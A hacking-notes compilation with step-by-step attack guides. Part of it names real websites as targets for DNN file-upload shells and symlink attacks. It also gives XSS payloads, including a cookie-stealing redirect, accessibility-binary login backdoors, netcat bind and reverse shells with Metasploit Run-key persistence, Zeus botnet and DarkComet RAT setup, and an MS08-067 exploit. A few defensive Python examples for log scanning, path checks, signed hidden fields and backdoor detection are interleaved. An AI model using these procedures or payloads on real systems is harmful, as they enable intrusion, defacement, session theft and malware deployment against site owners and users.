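VERSION_COMMENT_RE = re.compile(r"/\*!\d*\s*(.*?)\*/", re.S)   # /*!12345union select*/
PLAIN_COMMENT_RE = re.compile(r"/\*.*?\*/", re.S)               # /**/


def normalize(request_path):
    """Undo the layers the bypasses rely on: URL encoding (twice, for double-encoded
    payloads), MySQL version comments (the server executes their inner text, so keep
    it), plain comments (treated as whitespace), whitespace runs and case."""
    s = unquote_plus(unquote_plus(request_path))
    s = VERSION_COMMENT_RE.sub(r" \1 ", s)
    s = PLAIN_COMMENT_RE.sub(" ", s)
    s = re.sub(r"\s+", " ", s)
    return s.lower()


SIGNATURES = (
    ("union-based", re.compile(r"\bunion\b.*\bselect\b")),
    ("column-count probe", re.compile(r"\border by \d+")),
    ("error-based (extractvalue/updatexml)", re.compile(r"\b(extractvalue|updatexml)\s*\(")),
    ("information_schema read", re.compile(r"information_schema\.")),
    ("unbalanced quote in numeric id", re.compile(r"\bid=-?\d+'")),
)


def classify(request_path):
    """Labels of every signature that matches the normalized request."""
    norm = normalize(request_path)
    return [label for label, rx in SIGNATURES if rx.search(norm)]


def scan_log(text):
    """(request, labels) for each log line that matches at least one signature."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        labels = classify(m.group(1))
        if labels:
            hits.append((m.group(1), labels))
    return hits


if __name__ == "__main__":
    for request, labels in scan_log(SAMPLE_LOG):
        print(labels, request)
```

Normalization is the part worth keeping even if the pattern list changes: any signature applied before decoding and comment removal will be beaten by exactly the rewrites this page demonstrates. The 500-status probes followed by a 200 on the same parameter are the sequence to alert on, since that is what a successful column-count walk looks like from the server side.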
=====================================================================
4. DNN Portal Hacking
1 : inurl:tabid/176/Default.aspx
2 : inurl:"/portals/0/" site:.com
3 : inurl:/tabid/36/language/en-US/Default.aspx
4 : inurl:/portals/0/default.aspx
5 : DNN(Link Gallary)
6 : inurl:/tabid/36/language/en-US/Default.aspx
7 : inurl:fcklinkgallery.aspx
step 1 : http://www.parallax.com/tabid/768/productid/92/default.aspx [ Find a website with the above vulnerabilities ]
> Replace : /tabid/768/productid/92/default.aspx
> With : /Providers/Htmleditorproviders/fck/fcklinkgallery.aspx
step 2 : http://www.parallax.com/Providers/Htmleditorproviders/fck/fcklinkgallery.aspx
step 3 : click on File (A File On Your Site) and then replace the link with -->
javascript:__doPostBack('ctlURL$cmdUpload','')
step 4 : you will see the upload button. Upload { shell , Deface it , put your signature}
step 5: http://www.parallax.com/portals/0/shadow.txt
5. Symlink Attack
1] Upload shell 404.php on your hacked website and root the webserver.
2] Upload contact.php & database.php
> eg : http://getec.com.ar/wp-content/plugins/akismet/database.php
> eg : http://getec.com.ar/wp-content/plugins/akismet/contact.php
3] go to [sec. info] in your shell then [readable : etc/passwd <view>]
4] copy all username & passwd from [ etc/passwd ]
5] paste in [ http://site.com/contact.php ] [ config fucker ] tab.
6] now open your both links : [ http://site.com/database.php & http://site.com/configweb ]
> eg : http://getec.com.ar/wp-content/plugins/akismet/database.php
> eg : http://getec.com.ar/wp-content/plugins/akismet/configweb/
7] on configweb page [ you have some text that contain user & password ] [ these files are
reverse or linked website details ]
8] Now login to them using database.php [ change password in database ]
9] login to main site then and deface there index.php page.
6. XSS
1. <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
2. <IMG SRC="javascript:alert('XSS');">
3. <IMG SRC=javascript:alert('XSS')>
4. <IMG SRC=JaVaScRiPt:alert('XSS')>
6. <IMG SRC=javascript:alert("XSS")>
7. <IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
8. <IMG """><SCRIPT>alert("XSS")</SCRIPT>">
10. <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
11. <IMG
SRC=javascript:al

1;rt('XSS')>
12. <IMG SRC=javascri&#0000112t:alert('XSS')>
13. <IMG SRC="javascript:alert('XSS');">
==========================================================================
Hands On Series – Cross Site Scripting (XSS) Part 1
In this episode we start dealing with Cross Site Scripting (XSS) attacks.
CSS = Cascading Style Sheets
XSS = Cross Site Scripting
Cross Site Scripting is a technique used to add script to a trusted site that will be executed in other users' browsers.
A key element to XSS is that one user can submit data to a website that will later be displayed to other users.
It is necessary that the bad guy NOT mess up the HTML structure, otherwise the result will be web defacement rather than attacking other users.
The hackme site has been updated and improved (more about that in a moment)
and now includes a section for XSS which we will be using in this episode.
As usual, for the "Hands on Series" I recommend that you listen to these episodes while viewing the hacking test site and have the show notes visible and ready to cut and paste from.
If we look at the source for the page we will see this:
Let's start by trying to somehow add an attribute so that when someone mouses over the name, the javascript will be executed.
----------------------------------------------------------------------------------------------------------------------------
Attack #1 – Against Email Address
=================================
Attack 1: Original
<a href="mailto:john@somedomain.com">John Doe</a>
Attack 1: Desired addition
onmouseover="alert('Hacked');"
Attack 1: Desired Result
<a href="mailto:bob@bob.com" onmouseover="alert('Hacked');">Bob Smith</a>
Attack 1: Attack String
bob@bob.com" onmouseover="alert('Hacked');
Attack 1: Actual Result
<a href="mailto:bob@bob.com" onmouseover="alert('Hacked');">Bob Smith</a>
Success! Mouse over the Name you entered and you see a popup that says "I hacked you".
At this point we have proven that we can insert code onto the site and have it executed by a web browser!
This attack is only executed based on a user event (the user mousing over the link).
Let's try creating a script tag, which will get executed while the page is loaded by the browser (so basically right away).
-----------------------------------------------------------------------------------------------------------------------------
Attack #2 – Against Email Address
=================================
Attack 2: Original
<a href="mailto:john@somedomain.com">John Doe</a>
Attack 2: Desired addition
<script>alert('Hacked');</script>
Attack 2: Desired Result
<a href="mailto:bob@bob.com"><script>alert('Hacked');</script><">Bob Smith</a>
Attack 2: Attack String
bob@bob.com"><script>alert('Hacked');</script><"
Attack 2: Actual Result
<a href="mailto:bob@bob.com"><script>alert('Hacked');</script><"">Bob Smith</a>
Failure! No popup takes place.
Notice the Actual Result does not match the Desired Result.
This is because of htmlentities as mentioned in the helper notes.
-----------------------------------------------------------------------------------------------------------------------------
Attack #3 – Against Title
=========================
Attack 3: Original
<td>Works Great</td>
Attack 3: Desired addition
<script>alert('Hacked');</script>
Attack 3: Desired Result
<td><script>alert('Hacked');</script></td>
Attack 3: Attack String
Works Great<script>alert('Hacked');</script>
Attack 3: Actual Result
<td>Works Great<script>alert('Hacked');</script></td>
Failure! No popup takes place.
This almost worked, except that the single and double quotes get escaped, so let's try making something that doesn't need quotes.
-----------------------------------------------------------------------------------------------------------------------------
Attack #4 – Against Title
=========================
In the alert function let's use the global variable document.domain in the attack string.
Attack 4: Attack String
Works Great<script>alert(document.domain);</script>
Attack 4: Actual Result
<td>Works Great<script>alert(document.domain);</script></td>
Success! A popup should appear that says hackme.ntobjectives.com
Maybe this isn't convincing enough... let's try cookies.
-----------------------------------------------------------------------------------------------------------------------------
Attack #5 – Against Title
=========================
Attack 5: Attack String
Works Great<script>alert(document.cookie);</script>
Attack 5: Actual Result
<td>Works Great<script>alert(document.cookie);</script></td>
Success! A popup should appear that shows all your cookie data.
There's nothing stopping the hacker from having the user send this data to their server.
I have set up a page for displaying inputs sent to it, but it makes sure to escape characters to make sure this isn't an attack point.
http://hackme.ntobjectives.com/xss/bin.php
Try it now
http://hackme.ntobjectives.com/xss/bin.php?abc=123
You should be shown that abc=123
This page will display anything you put in the GET params.
I want to push your cookie data over to my site, so that I can attempt a session take over.
-----------------------------------------------------------------------------------------------------------------------------
Attack #6 – Against Title
=========================
Attack 6: Original
<td>Works Great</td>
Attack 6: Desired addition
<script>window.location='http://hackme.ntobjectives.com/xss/bin.php?var='+document.cookie;</script>
We have already established that I cannot insert those single quotes that I need around the URL, so we need to move on to slightly more advanced methods.
Using the javascript function String.fromCharCode allows me to get around needing quotes by turning each decimal value into its character, and it doesn't require any quotes.
So we just convert our desired string into decimal first
This:
http://hackme.ntobjectives.com/xss/bin.php?var=
becomes:
104,116,116,112,58,47,47,104,97,99,107,109,101,46,109,105,103,104,116,121,115,101,101,107,46,99,111,109,47,120,115,115,47,98,105,110,46,112,104,112,63,118,97,114,61
and the attack string becomes
Attack 6: Attack String
Works Great<script>window.location=String.fromCharCode(104,116,116,112,58,47,47,104,97,99,107,109,101,46,109,105,103,104,116,121,115,101,101,107,46,99,111,109,47,120,115,115,47,98,105,110,46,112,104,112,63,118,97,114,61)+document.cookie;</script>
Attack 6: Actual Result
<td>Works Great<script>window.location=String.fromCharCode(104,116,116,112,58,47,47,104,97,99,107,109,101,46,109,105,103,104,116,121,115,101,101,107,46,99,111,109,47,120,115,115,47,98,105,110,46,112,104,112,63,118,97,114,61)+document.cookie;</script></td>
Success! Your browser should be sitting on http://hackme.ntobjectives.com/xss/bin.php and showing you all the data from your cookies.
If this were an attacker's site, it would just collect the info and pass you back to the page you came from, and it's unlikely you would have ever noticed that your session information had been stolen.
8. PHP Disclosing [ site.com/a.php?id=index.php ] [ Disclose index.php ]
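Both the `../../etc/passwd` traversal near the start of this section and the `a.php?id=index.php` source disclosure above come from the same defect: a file name taken from the request is opened relative to the web root with no check on where it actually resolves. The following is an added example, not from the notes, in Python: it canonicalizes the joined path, refuses anything that lands outside the content directory (including absolute paths and symlinks pointing out of it), and serves only an allow-list of content extensions so the application's own source can never be read back. The web root it builds is a constructed stand-in in a temporary directory.

```python
# Added example (not from the notes): resolve a user-supplied file name against a base
# directory and refuse anything that escapes it or is not a servable content file.
import os
import tempfile

ALLOWED_EXTENSIONS = {".txt", ".html"}   # never the application's own source files


def safe_resolve(base_dir, user_path):
    """Join, canonicalize (realpath follows symlinks and collapses ..), then check
    the result is still inside base_dir. An absolute user_path is rejected too,
    because os.path.join discards base_dir for absolute paths."""
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, user_path))
    if os.path.commonpath([base, target]) != base:
        raise PermissionError("path escapes the content directory: %r" % user_path)
    if os.path.splitext(target)[1].lower() not in ALLOWED_EXTENSIONS:
        raise PermissionError("file type not servable: %r" % user_path)
    return target


def read_content_file(base_dir, user_path):
    """Read a file only after safe_resolve has accepted it."""
    with open(safe_resolve(base_dir, user_path), "r", encoding="utf-8") as fh:
        return fh.read()


def is_allowed(base_dir, user_path):
    """True if safe_resolve would serve the path."""
    try:
        safe_resolve(base_dir, user_path)
        return True
    except PermissionError:
        return False


def build_demo_site():
    """Constructed web root: one servable article and the application's index.php."""
    root = tempfile.mkdtemp(prefix="demo_site_")
    os.mkdir(os.path.join(root, "articles"))
    with open(os.path.join(root, "articles", "about.txt"), "w", encoding="utf-8") as fh:
        fh.write("about page text")
    with open(os.path.join(root, "index.php"), "w", encoding="utf-8") as fh:
        fh.write("<?php /* application source, must not be disclosed */ ?>")
    return root


if __name__ == "__main__":
    root = build_demo_site()
    for candidate in ("articles/about.txt", "../../../../etc/passwd", "/etc/passwd", "index.php"):
        print("%-28s %s" % (candidate, "served" if is_allowed(root, candidate) else "refused"))
```

The order of the two checks is intentional: the containment test runs on the resolved path, so encoded or doubled `..` sequences and symlinks are handled by the filesystem rather than by a blacklist of strings, and the extension check then narrows what is served to content the application actually means to expose.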
9. Manipulating Parameters
Step1 : open site and search for hidden elements...
Step2 : Change the hidden elements' values using Tamper Data or the developer toolkit [ Firefox add-ons ]
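Hidden fields can be edited in the browser exactly as the two steps above describe, so a server must never trust them as-is. The usual answer is to keep state server-side (look the price up by product id), and for any value that genuinely has to round-trip through the form, to sign it. The following is an added example, not from the notes, in Python: each hidden field is emitted with a companion `<name>_sig` field carrying an HMAC-SHA256 over the field name and value, and `verify_hidden` rejects a submission whose value no longer matches its signature. The key is a constructed placeholder.

```python
# Added example (not from the notes): hidden form fields carry a server-side HMAC,
# so a value changed in the browser is rejected when the form comes back.
import base64
import hashlib
import hmac
import html

# Placeholder key; a real deployment keeps this secret server-side and rotates it.
SECRET_KEY = b"constructed-demo-key-not-for-production"


def sign_hidden(name, value, key=SECRET_KEY):
    """HMAC-SHA256 over name and value; the name is included so a signature
    cannot be moved from one field to another. A NUL separator keeps
    ('ab', 'c') and ('a', 'bc') distinct."""
    msg = b"\x00".join([name.encode(), value.encode()])
    mac = hmac.new(key, msg, hashlib.sha256).digest()
    return base64.urlsafe_b64encode(mac).decode().rstrip("=")


def render_hidden(name, value):
    """Emit the hidden field plus a companion <name>_sig field, HTML-escaped."""
    n = html.escape(name, quote=True)
    return ('<input type="hidden" name="%s" value="%s">'
            '<input type="hidden" name="%s_sig" value="%s">'
            % (n, html.escape(value, quote=True), n, sign_hidden(name, value)))


def verify_hidden(form, name, key=SECRET_KEY):
    """Return the field value only if its signature checks out.
    compare_digest avoids leaking timing information about the expected MAC."""
    value = form.get(name, "")
    sig = form.get(name + "_sig", "")
    if not hmac.compare_digest(sig, sign_hidden(name, value, key)):
        raise ValueError("hidden field %r was modified or its signature is missing" % name)
    return value


def hidden_is_valid(form, name, key=SECRET_KEY):
    """Boolean form of verify_hidden."""
    try:
        verify_hidden(form, name, key)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    print(render_hidden("price", "49.99"))
    submitted = {"price": "0.01", "price_sig": sign_hidden("price", "49.99")}  # tampered
    print("tampered form accepted:", hidden_is_valid(submitted, "price"))
```

Signing protects integrity, not confidentiality: the value is still visible in the page source, so anything a user must not see does not belong in a hidden field at all, signed or otherwise.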
System Hacking
1. ADS [Alternate Data Streams]
Practical Guide to Alternative Data Streams in NTFS
step1 : type "tab.mp4" > C:\hack\tab.mp4:tab.mp4
go to location --> C:\hack
type command :
i. dir -> it shows all the stuff in the directory; confirm that tab.mp4 has been made with 0 KB size. Then,
ii. start vlc tab.mp4:tab.mp4
To detect ADS files use (only recovery tools can find these files):
i. ADS Spy v1.11
ii. get my data back
2. System Password Hacking & Cracking
ophCrack (Crack password)
John The Ripper (Crack password)
Cain & Abel (Crack password)
slax work (Crack password)
hiren boot cd (Remove password)
ERD commander (till win 7) [reset password & repair & recovery of windows from boot sector virus] (Remove password)
Saminside [windows tool] [U can dump any sam file to it for cracking] (Remove password)
Kon-Boot (Login Page Bypassing)
3. Back Doors
1. Win-XP
> c:\windows\system32
> copy CMD.EXE
> Change Name to " sethc.exe "
> Put back sethc.exe to " system32 " folder
2. Win-7
> c:\windows\system32
> look for " ULTRAMAN.EXE " change its permission , ownership and name .
> copy cmd.exe to desktop and rename it to " ULTRAMAN.EXE " then put it back in the system32 folder.
NOW :
> at login page press shift 5 times.
> cmd will pop up type command
> net user <username> /del , /add , * [ remove and reset password ]
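Both backdoors above rely on the same trick: a program the logon screen will launch before anyone is authenticated is replaced by a copy of cmd.exe. That leaves a simple integrity signal for a defender, because the replaced binary is now byte-for-byte identical to cmd.exe. The following is an added example, not from the notes, in Python: it hashes cmd.exe and each accessibility binary in a System32 directory and reports the ones whose contents match. To run anywhere, it builds a constructed stand-in for System32 in a temporary directory; on a real host, point it at `%SystemRoot%\System32` instead.

```python
# Added example (not from the notes): flag accessibility binaries in System32 whose
# contents are identical to cmd.exe, the signature of the sethc/utilman swap above.
import hashlib
import os
import tempfile

# Binaries the logon screen can launch before any user is authenticated.
ACCESSIBILITY_BINARIES = ("sethc.exe", "utilman.exe", "osk.exe", "narrator.exe",
                          "magnify.exe", "displayswitch.exe")


def sha256_file(path):
    """Stream the file through SHA-256 so large binaries are not read into memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 20), b""):
            digest.update(chunk)
    return digest.hexdigest()


def find_swapped_accessibility_binaries(system32_dir):
    """Return the accessibility binaries whose hash equals cmd.exe's hash.
    Returns [] when the directory or cmd.exe does not exist."""
    cmd_path = os.path.join(system32_dir, "cmd.exe")
    if not os.path.isfile(cmd_path):
        return []
    cmd_hash = sha256_file(cmd_path)
    hits = []
    for name in ACCESSIBILITY_BINARIES:
        path = os.path.join(system32_dir, name)
        if os.path.isfile(path) and sha256_file(path) == cmd_hash:
            hits.append(name)
    return hits


def build_demo_system32():
    """Constructed stand-in for System32 so the check runs on any platform:
    sethc.exe is a byte-for-byte copy of cmd.exe, utilman.exe is not."""
    d = tempfile.mkdtemp(prefix="demo_system32_")
    fake_cmd = b"MZ constructed cmd.exe stand-in"
    for name, content in (("cmd.exe", fake_cmd), ("sethc.exe", fake_cmd),
                          ("utilman.exe", b"MZ constructed utilman.exe stand-in")):
        with open(os.path.join(d, name), "wb") as fh:
            fh.write(content)
    return d


if __name__ == "__main__":
    demo = build_demo_system32()
    print("swapped:", find_swapped_accessibility_binaries(demo))
```

A hash match against cmd.exe catches the file-copy variant shown here; the same binaries should also be compared against the vendor-signed originals, and the `Image File Execution Options` Debugger value for each of them checked, since that registry setting achieves the same effect without touching the file.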
3. NetCat : [ Netcat can simply be described as a tool that can read and write to
TCP and UDP ports. This dual functionality suggests that Netcat runs in two
modes:“client” and “server”. ]
I. Connect to TCP/UDP Ports
> localhost ~ # nc -h [ Help ]
> localhost ~ # nc -vv www.site.com 22 [ nc -vv <site> <port> ]
Bind Shell
> Victim / User1 :
> C:\>nc -lvvp 4444 -e cmd.exe
> Attacker / User2 :
> BT ~ # nc -v 192.168.0.198 4444 [ User1 "cmd" comes to User2 ]
Reverse Shell
> User1 :
> C:\>nc -lvvp 4444
> User2 :
> BT ~ # nc -v 192.168.0.198 4444 -e /bin/bash [ Now, User2 is sending
his "shell" to User1 ]
Uploading Netcat After Hacking With Metasploit :
meterpreter > upload /pentest/windows-binaries/tools/nc.exe c:\WINDOWS\SYSTEM32
meterpreter > reg enumkey -k HKLM\software\Microsoft\Windows\CurrentVersion\Run
meterpreter > reg setval -k HKLM\software\Microsoft\Windows\CurrentVersion\Run -v NETCAT -d 'C:\WINDOWS\system32\nc.exe -L -d -p 1234 -e cmd.exe'
meterpreter > reg enumkey -k HKLM\software\Microsoft\Windows\CurrentVersion\Run
Note : Netcat can be installed on Win XP, Vista and 7 [ Once netcat is installed successfully on the victim OS there is no need to exploit again; use the commands: ]
root@bt:~# nc <victim ip> <port>
root@bt:~# nc 192.168.217.141 1234
4. Steganography
1. hiding text on image
> run
> cmd
> cd desktop
> copy /b image.jpg+password.txt final_image.jpg
2. OpenPuff
> Freeware, 256-bit multi-encryption, Carrier chains, Multi-layered obfuscation
5. Detect Steganography
Backtrack Forensics: Steganography
Menu: Forensics -> Forensic Analysis Tools
Directory: /usr/local/bin/
stegbreak
stegcompare
stegdeimage
stegdetect
stegdetect is a tool to detect steganography in image files. It supports different methods which are used to hide content. Currently, the detectable schemes are: jsteg, jphide (unix and windows), invisible secrets, outguess 0.13b, F5 (header analysis), appendX and camouflage. Stegbreak is used to launch dictionary attacks against JSteg-Shell, JPHide and OutGuess 0.13b.
Before we start to use the tools we need an image which has some hidden content. Let's review a few hiding apps before using stegdetect. As I didn't find any preinstalled in BT, I installed steghide first, which can hide content in jpeg, bmp, wav, au files.
Using steghide:
apt-get install steghide - installation
steghide --info IMG_4422.JPG - get info from the image (how much data can be hidden)
steghide --embed -ef mysecret.txt -cf IMG_4422.JPG -sf steg.jpg -p mypass -Z - hide
mysecret.txt with password "mypass", and create a new file, where the file is hidden, and don't
compress data
steghide --embed -ef mysecret.txt -cf IMG_4422.JPG -sf steg.jpg -p mypass - same as the
previous but w/ compression
steghide --extract -xf mysecret2.txt -sf steg2.jpg -p mypass - extract the file
The bad news is that stegdetect won't detect the steghide algorithm. Despite that, I tried it to see what happens.
Using stegdetect:
stegdetect -t [list of tests] steg.jpg - where tests can be (by default jopifa enabled):
j - Tests if information has been embedded with jsteg.
o - Tests if information has been embedded with outguess.
p - Tests if information has been embedded with jphide.
i - Tests if information has been hidden with invisible secrets.
f - Tests if information has been hidden with F5.
F - Tests if information has been hidden with F5 using a more sophisticated but fairly slow
detection algorithm.
a - Tests if information has been added at the end of file, for example by camouflage or
appendX.
stegdetect -s[number] steg.jpg - setting sensitivity
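The simplest hiding method on this page, `copy /b image.jpg+password.txt final_image.jpg`, just appends bytes after the end of the JPEG, and that is exactly what stegdetect's `a` test (appendX, camouflage) looks for. The following is an added example, not from the notes or from the stegdetect project, in Python: it walks the JPEG marker structure to find where the image data really ends and returns whatever follows. It walks the segments rather than searching backwards for the `FF D9` end-of-image marker, because the appended data may itself contain that byte pair (an appended second JPEG does). The sample JPEG is a constructed minimal file, not a real photograph.

```python
# Added example (not from the notes): walk a JPEG's marker structure to find where the
# image really ends and report anything appended after it (the copy /b trick above,
# which stegdetect's "a" test also looks for). The sample bytes are constructed.
SOI, EOI, SOS = 0xD8, 0xD9, 0xDA


def jpeg_end_offset(data):
    """Offset just past the EOI marker that terminates the image's own scan data."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG: missing SOI")
    pos = 2
    while pos + 2 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError("expected marker at offset %d" % pos)
        marker = data[pos + 1]
        if marker == 0xFF:                      # fill byte before a marker
            pos += 1
            continue
        if marker == EOI:
            return pos + 2
        if marker == SOI or marker == 0x01 or 0xD0 <= marker <= 0xD7:
            pos += 2                            # standalone markers carry no length
            continue
        if pos + 4 > len(data):
            raise ValueError("truncated segment header")
        seg_len = int.from_bytes(data[pos + 2:pos + 4], "big")
        if seg_len < 2:
            raise ValueError("bad segment length")
        pos += 2 + seg_len
        if marker == SOS:
            # Entropy-coded data follows; FF 00 is a stuffed byte and FF D0..D7 are
            # restart markers, both still image data. Anything else ends the scan.
            while True:
                nxt = data.find(b"\xff", pos)
                if nxt < 0 or nxt + 1 >= len(data):
                    raise ValueError("truncated entropy-coded data")
                b = data[nxt + 1]
                if b == 0x00 or 0xD0 <= b <= 0xD7:
                    pos = nxt + 2
                elif b == 0xFF:
                    pos = nxt + 1
                else:
                    pos = nxt
                    break
    raise ValueError("no EOI marker found")


def trailing_data(data):
    """Bytes after the image proper; b'' for a clean file."""
    return data[jpeg_end_offset(data):]


def build_minimal_jpeg():
    """Constructed: SOI, a JFIF APP0 segment, a one-component SOS header, a few bytes
    of scan data containing a stuffed FF 00 and an RST0 marker, then EOI."""
    app0 = b"\xff\xe0" + (16).to_bytes(2, "big") + b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    sos = b"\xff\xda" + (8).to_bytes(2, "big") + b"\x01\x01\x00\x00\x3f\x00"
    scan = b"\x12\x34\xff\x00\x56\xff\xd0\x78"
    return b"\xff\xd8" + app0 + sos + scan + b"\xff\xd9"


if __name__ == "__main__":
    clean = build_minimal_jpeg()
    stuffed = clean + b"password.txt contents appended with copy /b"
    print("clean   :", trailing_data(clean))
    print("appended:", trailing_data(stuffed))
```

A non-empty result is a strong signal but not proof of intent: some cameras and editors leave harmless trailers, so the next step in a real triage is to look at what the trailing bytes are (text, a ZIP or RAR header, a second JPEG) before deciding.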
Actually stegdetect found jphide for the original and the created image as well, so it's clearly a false positive.
I tried to see what stegbreak can do, and created a list of password where I put only one line, the
correct password.
stegbreak -f passlist.txt steg.jpg
I got the following error: "stegbreak: fopen: /usr/local/share/stegbreak/rules.ini: No such file or
directory"
I downloaded the source and placed the ini file in the said location, but you can also download it
from here.
After that I got a "Segmentation fault" error. I couldn't find a working solution for this problem,
however it's a known bug.
Second I tried outguess, which can hide info in jpeg files.
Using Outguess :
apt-get install outguess
outguess -k "mypass" -d index.html IMG_4422.JPG out2.jpg - hides index.html in
IMG_4422.JPG
Unfortunately stegdetect doesn't detect the hidden file (probably because I used outguess v2),
even if increasing the sensitivity, as you can see:
My last try was with jphide; I used the windows version, as I had no luck with installing the one for Linux. It can be downloaded from here.
As you can see stegdetect can detect it when increasing sensitivity, but it claims the same thing for the original image, so...
stegcompare can compare the original and the image which stores information, but I couldn't
figure out what the output means.
stegdeimage - not sure about what it should do, also gives the following error:
"/home/stego_analysis/compress/dscf0033.jpg : error: No such file or directory"
looking at the source code:
    if (jpg_open("/home/stego_analysis/compress/dscf0033.jpg") == -1)
        return;
it is clear that it will never run, unless you have such an image.
Overall I'm not really convinced by the stegdetect toolset, it's buggy, and doesn't really find
steganography correctly.
Official website for steghide: http://steghide.sourceforge.net/
Official website for stegdetect and outguess: http://www.outguess.org/
Official website for jphide: http://linux01.gwdg.de/~alatham/stego.html
outguess :
6. Bypassing Login Page Windows With Backtrack
Make a bootable backtrack pendrive
Boot the system and open backtrack
Open Terminal
mkdir /root/Desktop/p7771 [ Create any folder ]
fdisk -l
mount /dev/sda2 /root/Desktop/p7771 [ Mount Your windows C-Drive ]
ls -la /root/Desktop/p7771/
cd /pentest/password/chntpw
./chntpw -i Desktop/p7771/Windows/System32/config/sam
Press - 1 [ Edit User Data And Password ]
Press - 1 [ Clear Blank User Password ]
Press - q [ Quit ]
Press - y [ Write hive file ? ]
Malwares
1. Botnet
I ] How To Find Cpanel :
A] we need a compromised website with Symlink attack eg :
link:www.site.com/akismet/configweb [ it has all password files ]
1] python cracker.py http://www.pjmi.net/wp-content/plugins/akismet/configweb/
'/root/Desktop/ab' [ copy all password to ab folder from compromised Symlink website ]
2] upload cpanal.php to your shell.
3] copy all password to your cpanal.php
4] run command on your previous shell "eg: wso.php" for user name ---> ls /var/mail
5] copy all user to your cpanel.php
6] click on start it will show you list of active cpanel
7] find website from reverse ip lookup
8] default port for cpanel :2082 [ www.site.com:2082 ]
II ] Configuring Zeus Botnet :
A ] Creating IRC Server :
1] open c-panel
2] go into public folder
3] create folder [ Eg : XXX ]
4] upload your IRC scripts [Zeus.rar in your cpanal to make your cpanal an IRC
Server ]
5] extract the Zeus.rar to server.
6] open www.site.com/XXX/install/index.php
NOW : Now we will setup a database and link it with our IRC server.
B ] Creating Database :
7] go into cpanel & click into my sql database wizard
8] crate a new database and user
Eg : Yahoo >> Next
Eg : User Name = yahoo
Eg : Password = Click on " Generate Password " [ Copy/Rembember [ User Name & Password ]
9] Click on create user.
10] Go to = www.site.com/XXX/install/index.php
> give password that has been generated.
11] Come back to your database page and assign/give permision or click on all
privilidge.
12] Copy username & database name and go to -->
www.site.com/XXX/install/index.php [ Under Mysql Server ]
> give the user name.
> give the database name.
13] Click on next step [ Database will be created and linked with IRC server ]
14] Now for login in botnet panel we have to give : password [ Eg:abc123 ]in -->
www.site.com/XXX/install/index.php [ Under Root User ] [ By default user will be "admin" ]
15] Now create encryption key Eg : 123123 [ Under Options : ]
16] Before Pressing " install " [ In www.site.com/XXX/install/index.php ] go
back to your folder " XXX " [ Where you have uploaded your IRC ]
> Right click on --> system [ Folder ]
> Change Permission to --> 777 [Read-Write-Exicute]
17] Go back to control panel [ www.site.com/XXX/install/index.php ] Press "
Install "
18] Now go to --> www.site.com/XXX/cp.php
> Username = admin
> Password = abc123
C ] Configuring Bot :
19] Open & Extract "client.rar" .
20] Run "gzero.exe"
21] Click On Builder > click on " edit ".
> configuration file of bot will be opened.
> replace all links with your server path -- > www.site.com/XXX/
> Eg. http://www.rumahbaut.com/xxx/cfg.bin ----->
http://www.site.com/xxx/cfg.bin
> Eg. http://www.rumahbaut.com/xxx/tr.exe ------>
http://www.site.com/xxx/tr.exe
> Eg. http://www.rumahbaut.com/xxx/gate.php --->
http://www.site.com/xxx/gate.php
> Eg. http://www.rumahbaut.com/xxx/cfg1.bin ----->
http://www.site.com/xxx/cfg1.bin
> Eg. Encryption key = 1221421412 ------> Your encryption key [ 12312]
22] Click on " BUILD THE BOT CONFIGURATION " name Eg. BOT
Then ,
23] Click on " BUILD THE BOT EXECUTABLE " name Eg. tr.exe
D] Uploading The Bot :
24] Go to your IRC server folder where u uploaded & Extracted your zeus.rar file
[ www.site.com/ ]
25] Upload Both file that u have created "BOT" & "tr.exe"
NOTE : If doesn't UPLOAD : Try to compress and upload OR UPLOAD Both bot from your
shell. [wso.php]
3. Trojans [ Top Ten RAT ( Remote Administrative Tools ) ]
Dark Comet [ Setting Up Dark Comet RAT ]
1. Run client.exe
> allow connection
> Edit Server
> main setting
> connection setting
> Ip: Get local IP < Your IP>
> port : <any>
> Server Setup
> melt server
> Server Shield
> Anti Virtual Box
> Icon Setting
> Generate Server
> active keylogger
> create server
> click on connection.
> port listining mode
2. Give app to victim
3. Control Its PC
Cyber Gate
4. Worms
A worm is similar to a virus by design and is considered to be a sub-class of a virus. Worms
spread from computer to computer, but unlike a virus, it has the capability to travel without any
human action. A worm takes advantage of file or information transport features on your system,
which is what allows it to travel unaided.
The biggest danger with a worm is its capability to replicate itself on your system, so rather than
your computer sending out a single worm, it could send out hundreds or thousands of copies of
itself, creating a huge devastating effect. One example would be for a worm to send a copy of
itself to everyone listed in your e-mail address book. Then, the worm replicates and sends itself
out to everyone listed in each of the receiver's address book, and the manifest continues on down
the line.
Due to the copying nature of a worm and its capability to travel across networks the end result in
most cases is that the worm consumes too much system memory (or network bandwidth),
causing Web servers, network servers and individual computers to stop responding. In recent
worm attacks such as the much-talked-about Blaster Worm, the worm has been designed to
tunnel into your system and allow malicious users to control your computer remotely.
Penetration testing
Types Of Testing :
1. White-Box Testing
2. Black-Box Testing
3. Grey-Box Testing
4. Internal Testing
5. External Testing
Process Of Pen-testing :
1. Information gathering
2. Scanning & Banner Grabbing
3. Vulnerability Scanning
4. Exploitation ( Obtaining Access )
5. Maintaining Access & Erasing Evidence
Tools :
1. Metasploit
2. Core-impact
METASPLOIT
Vulnerability : A weakness that allows an attacker to compromise the security of a system.
Exploits : Doing the step by step procedure of gathering information
Payload : the process to gain access which is blocked by user
Encoders : The process to remove tracks.
Need for Metasploit
1. It is difficult to manage, update and customize the dozens of exploits available on the internet for different technologies.
2. Customizing exploits is time consuming, and one also needs high skill to do so.
METASPLOIT
Testing framework for Penetration testing contains 1300+exploit
http://cve.mitre.org
rapid7.com
www.exploit-db.com
I. Windows XP
To open Metasploit in kali Linux or backtrack use command : msfconsole
RCE ( Netapi ) ( Remote Code Execution ) [Win XP SP-2,3 -> vulnerable OS]
msfconsole
search netapi
use exploit/windows/smb/ms08_067_netapi [ CVE NO = 067 ]
show options
set RHOST [TARGET IP] -> 192.168.1.20
set PAYLOAD windows/meterpreter/bind_tcp
